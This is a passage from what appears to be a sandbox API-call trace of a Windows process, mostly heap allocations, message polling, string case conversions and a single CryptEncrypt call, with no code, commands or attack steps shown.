hHeap=0x25c0000) returned 1 [0262.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.415] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.416] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.416] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.416] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.417] CharLowerBuffW (in: lpsz="byte[79400]", cchLength=0xb | out: lpsz="byte[79400]") returned 0xb [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.417] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0262.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0262.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.420] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.420] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.421] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.421] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.421] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.421] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0262.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.422] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34b2250*, pdwDataLen=0x8bef68*=0x13626, dwBufLen=0x13628 | out: pbData=0x34b2250*, pdwDataLen=0x8bef68*=0x13628) returned 1 [0262.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0262.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0262.423] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0262.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0262.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0262.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.426] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.426] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.426] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.426] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.427] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.427] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.427] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.427] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.427] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.427] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.428] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.428] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.428] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.428] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.428] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.428] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.428] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.429] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.429] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.429] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.435] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.435] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.435] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.440] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0262.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.440] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.440] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0262.440] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.441] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0262.441] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 